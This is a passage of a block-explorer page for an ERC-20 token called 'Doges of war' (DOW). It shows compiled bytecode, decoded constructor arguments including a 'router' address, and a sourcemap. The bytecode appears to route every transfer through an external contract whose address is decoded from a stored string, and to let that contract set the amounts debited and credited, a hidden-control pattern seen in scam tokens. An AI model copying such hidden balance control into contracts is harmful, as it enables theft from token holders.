f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103b2565b610605816109af565b50565b6001600160a01b03831661066a5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016103b2565b6001600160a01b0382166106cb5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103b2565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b03831661078f5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103b2565b6001600160a01b0382166107f15760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103b2565b5f806108846003805461080390610bdd565b80601f016020809104026020016040519081016040528092919081815260200182805461082f90610bdd565b801561087a5780601f106108515761010080835404028352916020019161087a565b820191905f5260205f20905b81548152906001019060200180831161085d57829003601f168201915b5050505050610529565b6040516245608d60e81b81526001600160a01b03878116600483015286811660248301526044820186905291909116906345608d009060640160408051808303815f875af11580156108d8573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906108fc9190610c6a565b6001600160a01b0387165f90815260016020526040812080549395509193508492610928908490610c29565b90915550506001600160a01b0384165f9081526001602052604081208054839290610954908490610c3c565b92505081905550836001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040516109a091815260200190565b60405180910390a35050505050565b5f80546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b5f6020808352835180828501525f5b81811015610a2957858101830151858201604001528201610a0d565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b0381168114610605575f80fd5b5f8060408385031215610a6e575f80fd5b8235610a7981610a49565b946020939093013593505050565b5f805f60608486031215610a99575f80fd5b8335610aa481610a49565b92506020840135610ab481610a49565b929592945050506040919091013590565b5f60208284031215610ad5575f80fd5b8135610ae081610a49565b9392505050565b5f8060408385031215610af8575f80fd5b8235610b0381610a49565b91506020830135610b1381610a49565b809150509250929050565b634e487b7160e01b5f52604160045260245ffd5b5f60208284031215610b42575f80fd5b813567ffffffffffffffff80821115610b59575f80fd5b818401915084601f830112610b6c575f80fd5b813581811115610b7e57610b7e610b1e565b604051601f8201601f19908116603f01168101908382118183101715610ba657610ba6610b1e565b81604052828152876020848701011115610bbe575f80fd5b826020860160208301375f928101602001929092525095945050505050565b600181811c90821680610bf157607f821691505b602082108103610c0f57634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b8181038181111561032057610320610c15565b8082018082111561032057610320610c15565b5f60208284031215610c5f575f80fd5b8151610ae081610a49565b5f8060408385031215610c7b575f80fd5b50508051602090910151909290915056fea26469706673582212201528d5d859fe1be533cd05f9506ee9abc30914fc95e21d06c2c437d16ec85eb564736f6c63430008140033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000006fa4a3e174a64ab046fba5654557c92bff202348000000000000000000000000000000000000000000000000000000174876e800000000000000000000000000000000000000000000000000000000000000000c446f676573206f662077617200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003444f570000000000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): Doges of war
Arg [1] : symbol_ (string): DOW
Arg [2] : router (address): 0x6fa4a3e174A64Ab046Fba5654557c92bff202348
Arg [3] : supply (uint256): 100000000000

-----Encoded View---------------
8 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000c0
Arg [2] : 0000000000000000000000006fa4a3e174a64ab046fba5654557c92bff202348
Arg [3] : 000000000000000000000000000000000000000000000000000000174876e800
Arg [4] : 000000000000000000000000000000000000000000000000000000000000000c
Arg [5] : 446f676573206f66207761720000000000000000000000000000000000000000
Arg [6] : 0000000000000000000000000000000000000000000000000000000000000003
Arg [7] : 444f570000000000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

10174:10049:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;11517:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13947:194;;;;;;:::i;:::-;;:::i;:::-;;;1188:14:1;;1181:22;1163:41;;1151:2;1136:18;13947:194:0;1023:187:1;12637:108:0;12725:12;;12637:108;;;1361:25:1;;;1349:2;1334:18;12637:108:0;1215:177:1;14623:491:0;;;;;;:::i;:::-;;:::i;12479:93::-;;;12562:2;2000:36:1;;1988:2;1973:18;12479:93:0;1858:184:1;15523:290:0;;;;;;:::i;:::-;;:::i;10486:28::-;;;;;-1:-1:-1;;;;;10486:28:0;;;;;;-1:-1:-1;;;;;2211:32:1;;;2193:51;;2181:2;2166:18;10486:28:0;2047:203:1;12808:143:0;;;;;;:::i;:::-;-1:-1:-1;;;;;12925:18:0;12898:7;12925:18;;;:9;:18;;;;;;;12808:143;2600:103;;;:::i;:::-;;2169:87;2215:7;2242:6;-1:-1:-1;;;;;2242:6:0;2169:87;;11736:104;;;:::i;16316:439::-;;;;;;:::i;:::-;;:::i;13361:200::-;;;;;;:::i;:::-;;:::i;13624:176::-;;;;;;:::i;:::-;-1:-1:-1;;;;;13765:18:0;;;13738:7;13765:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;13624:176;13003:141;;;;;;:::i;:::-;;:::i;2858:238::-;;;;;;:::i;:::-;;:::i;11517:100::-;11571:13;11604:5;11597:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;11517:100;:::o;13947:194::-;14055:4;14072:39;744:10;14095:7;14104:6;14072:8;:39::i;:::-;-1:-1:-1;14129:4:0;13947:194;;;;;:::o;14623:491::-;14763:4;14780:36;14790:6;14798:9;14809:6;14780:9;:36::i;:::-;-1:-1:-1;;;;;14854:19:0;;14827:24;14854:19;;;:11;:19;;;;;;;;744:10;14854:33;;;;;;;;14920:26;;;;14898:116;;;;-1:-1:-1;;;14898:116:0;;4545:2:1;14898:116:0;;;4527:21:1;4584:2;4564:18;;;4557:30;4623:34;4603:18;;;4596:62;-1:-1:-1;;;4674:18:1;;;4667:38;4722:19;;14898:116:0;;;;;;;;;15025:57;15034:6;744:10;15056:25;15075:6;15056:16;:25;:::i;:::-;15025:8;:57::i;:::-;-1:-1:-1;15102:4:0;;14623:491;-1:-1:-1;;;;14623:491:0:o;15523:290::-;744:10;15636:4;15725:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;15725:34:0;;;;;;;;;;15636:4;;15653:130;;15703:7;;15725:47;;15762:10;;15725:47;:::i;2600:103::-;2215:7;2242:6;-1:-1:-1;;;;;2242:6:0;744:10;2008:23;2000:68;;;;-1:-1:-1;;;2000:68:0;;5349:2:1;2000:68:0;;;5331:21:1;;;5368:18;;;5361:30;5427:34;5407:18;;;5400:62;5479:18;;2000:68:0;5147:356:1;2000:68:0;2665:30:::1;2692:1;2665:18;:30::i;:::-;2600:103::o:0;11736:104::-;11792:13;11825:7;11818:14;;;;;:::i;16316:439::-;744:10;16434:4;16478:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;16478:34:0;;;;;;;;;;16545:35;;;;16523:122;;;;-1:-1:-1;;;16523:122:0;;5710:2:1;16523:122:0;;;5692:21:1;5749:2;5729:18;;;5722:30;5788:34;5768:18;;;5761:62;-1:-1:-1;;;5839:18:1;;;5832:35;5884:19;;16523:122:0;5508:401:1;16523:122:0;16656:67;744:10;16679:7;16688:34;16707:15;16688:16;:34;:::i;16656:67::-;-1:-1:-1;16743:4:0;;16316:439;-1:-1:-1;;;16316:439:0:o;13361:200::-;13472:4;13489:42;744:10;13513:9;13524:6;13489:9;:42::i;13003:141::-;13059:12;13108:4;13097:27;;;;;;;;;;;;:::i;2858:238::-;2215:7;2242:6;-1:-1:-1;;;;;2242:6:0;744:10;2008:23;2000:68;;;;-1:-1:-1;;;2000:68:0;;5349:2:1;2000:68:0;;;5331:21:1;;;5368:18;;;5361:30;5427:34;5407:18;;;5400:62;5479:18;;2000:68:0;5147:356:1;2000:68:0;-1:-1:-1;;;;;2961:22:0;::::1;2939:110;;;::::0;-1:-1:-1;;;2939:110:0;;6380:2:1;2939:110:0::1;::::0;::::1;6362:21:1::0;6419:2;6399:18;;;6392:30;6458:34;6438:18;;;6431:62;-1:-1:-1;;;6509:18:1;;;6502:36;6555:19;;2939:110:0::1;6178:402:1::0;2939:110:0::1;3060:28;3079:8;3060:18;:28::i;:::-;2858:238:::0;:::o;19114:378::-;-1:-1:-1;;;;;19250:19:0;;19242:68;;;;-1:-1:-1;;;19242:68:0;;6787:2:1;19242:68:0;;;6769:21:1;6826:2;6806:18;;;6799:30;6865:34;6845:18;;;6838:62;-1:-1:-1;;;6916:18:1;;;6909:34;6960:19;;19242:68:0;6585:400:1;19242:68:0;-1:-1:-1;;;;;19329:21:0;;19321:68;;;;-1:-1:-1;;;19321:68:0;;7192:2:1;19321:68:0;;;7174:21:1;7231:2;7211:18;;;7204:30;7270:34;7250:18;;;7243:62;-1:-1:-1;;;7321:18:1;;;7314:32;7363:19;;19321:68:0;6990:398:1;19321:68:0;-1:-1:-1;;;;;19400:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;19452:32;;1361:25:1;;;19452:32:0;;1334:18:1;19452:32:0;;;;;;;19114:378;;;:::o;17245:604::-;-1:-1:-1;;;;;17385:20:0;;17377:70;;;;-1:-1:-1;;;17377:70:0;;7595:2:1;17377:70:0;;;7577:21:1;7634:2;7614:18;;;7607:30;7673:34;7653:18;;;7646:62;-1:-1:-1;;;7724:18:1;;;7717:35;7769:19;;17377:70:0;7393:401:1;17377:70:0;-1:-1:-1;;;;;17466:23:0;;17458:71;;;;-1:-1:-1;;;17458:71:0;;8001:2:1;17458:71:0;;;7983:21:1;8040:2;8020:18;;;8013:30;8079:34;8059:18;;;8052:62;-1:-1:-1;;;8130:18:1;;;8123:33;8173:19;;17458:71:0;7799:399:1;17458:71:0;17599:15;17616;17654;17661:7;17654:15;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:6;:15::i;:::-;17635:74;;-1:-1:-1;;;17635:74:0;;-1:-1:-1;;;;;8461:15:1;;;17635:74:0;;;8443:34:1;8513:15;;;8493:18;;;8486:43;8545:18;;;8538:34;;;17635:49:0;;;;;;;8378:18:1;;17635:74:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1;;;;;17720:17:0;;;;;;:9;:17;;;;;:28;;17598:111;;-1:-1:-1;17598:111:0;;-1:-1:-1;17598:111:0;;17720:28;;17598:111;;17720:28;:::i;:::-;;;;-1:-1:-1;;;;;;;17759:20:0;;;;;;:9;:20;;;;;:31;;17783:7;;17759:20;:31;;17783:7;;17759:31;:::i;:::-;;;;;;;;17823:9;-1:-1:-1;;;;;17806:35:0;17815:6;-1:-1:-1;;;;;17806:35:0;;17834:6;17806:35;;;;1361:25:1;;1349:2;1334:18;;1215:177;17806:35:0;;;;;;;;17366:483;;17245:604;;;:::o;3256:191::-;3330:16;3349:6;;-1:-1:-1;;;;;3366:17:0;;;-1:-1:-1;;;;;;3366:17:0;;;;;;3399:40;;3349:6;;;;;;;3399:40;;3330:16;3399:40;3319:128;3256:191;:::o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:131::-;-1:-1:-1;;;;;642:31:1;;632:42;;622:70;;688:1;685;678:12;703:315;771:6;779;832:2;820:9;811:7;807:23;803:32;800:52;;;848:1;845;838:12;800:52;887:9;874:23;906:31;931:5;906:31;:::i;:::-;956:5;1008:2;993:18;;;;980:32;;-1:-1:-1;;;703:315:1:o;1397:456::-;1474:6;1482;1490;1543:2;1531:9;1522:7;1518:23;1514:32;1511:52;;;1559:1;1556;1549:12;1511:52;1598:9;1585:23;1617:31;1642:5;1617:31;:::i;:::-;1667:5;-1:-1:-1;1724:2:1;1709:18;;1696:32;1737:33;1696:32;1737:33;:::i;:::-;1397:456;;1789:7;;-1:-1:-1;;;1843:2:1;1828:18;;;;1815:32;;1397:456::o;2255:247::-;2314:6;2367:2;2355:9;2346:7;2342:23;2338:32;2335:52;;;2383:1;2380;2373:12;2335:52;2422:9;2409:23;2441:31;2466:5;2441:31;:::i;:::-;2491:5;2255:247;-1:-1:-1;;;2255:247:1:o;2507:388::-;2575:6;2583;2636:2;2624:9;2615:7;2611:23;2607:32;2604:52;;;2652:1;2649;2642:12;2604:52;2691:9;2678:23;2710:31;2735:5;2710:31;:::i;:::-;2760:5;-1:-1:-1;2817:2:1;2802:18;;2789:32;2830:33;2789:32;2830:33;:::i;:::-;2882:7;2872:17;;;2507:388;;;;;:::o;2900:127::-;2961:10;2956:3;2952:20;2949:1;2942:31;2992:4;2989:1;2982:15;3016:4;3013:1;3006:15;3032:921;3100:6;3153:2;3141:9;3132:7;3128:23;3124:32;3121:52;;;3169:1;3166;3159:12;3121:52;3209:9;3196:23;3238:18;3279:2;3271:6;3268:14;3265:34;;;3295:1;3292;3285:12;3265:34;3333:6;3322:9;3318:22;3308:32;;3378:7;3371:4;3367:2;3363:13;3359:27;3349:55;;3400:1;3397;3390:12;3349:55;3436:2;3423:16;3458:2;3454;3451:10;3448:36;;;3464:18;;:::i;:::-;3539:2;3533:9;3507:2;3593:13;;-1:-1:-1;;3589:22:1;;;3613:2;3585:31;3581:40;3569:53;;;3637:18;;;3657:22;;;3634:46;3631:72;;;3683:18;;:::i;:::-;3723:10;3719:2;3712:22;3758:2;3750:6;3743:18;3798:7;3793:2;3788;3784;3780:11;3776:20;3773:33;3770:53;;;3819:1;3816;3809:12;3770:53;3875:2;3870;3866;3862:11;3857:2;3849:6;3845:15;3832:46;3920:1;3898:15;;;3915:2;3894:24;3887:35;;;;-1:-1:-1;3902:6:1;3032:921;-1:-1:-1;;;;;3032:921:1:o;3958:380::-;4037:1;4033:12;;;;4080;;;4101:61;;4155:4;4147:6;4143:17;4133:27;;4101:61;4208:2;4200:6;4197:14;4177:18;4174:38;4171:161;;4254:10;4249:3;4245:20;4242:1;4235:31;4289:4;4286:1;4279:15;4317:4;4314:1;4307:15;4171:161;;3958:380;;;:::o;4752:127::-;4813:10;4808:3;4804:20;4801:1;4794:31;4844:4;4841:1;4834:15;4868:4;4865:1;4858:15;4884:128;4951:9;;;4972:11;;;4969:37;;;4986:18;;:::i;5017:125::-;5082:9;;;5103:10;;;5100:36;;;5116:18;;:::i;5914:259::-;5992:6;6045:2;6033:9;6024:7;6020:23;6016:32;6013:52;;;6061:1;6058;6051:12;6013:52;6093:9;6087:16;6112:31;6137:5;6112:31;:::i;8583:245::-;8662:6;8670;8723:2;8711:9;8702:7;8698:23;8694:32;8691:52;;;8739:1;8736;8729:12;8691:52;-1:-1:-1;;8762:16:1;;8818:2;8803:18;;;8797:25;8762:16;;8797:25;;-1:-1:-1;8583:245:1:o

Swarm Source

ipfs://1528d5d859fe1be533cd05f9506ee9abc30914fc95e21d06c2c437d16ec85eb5
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.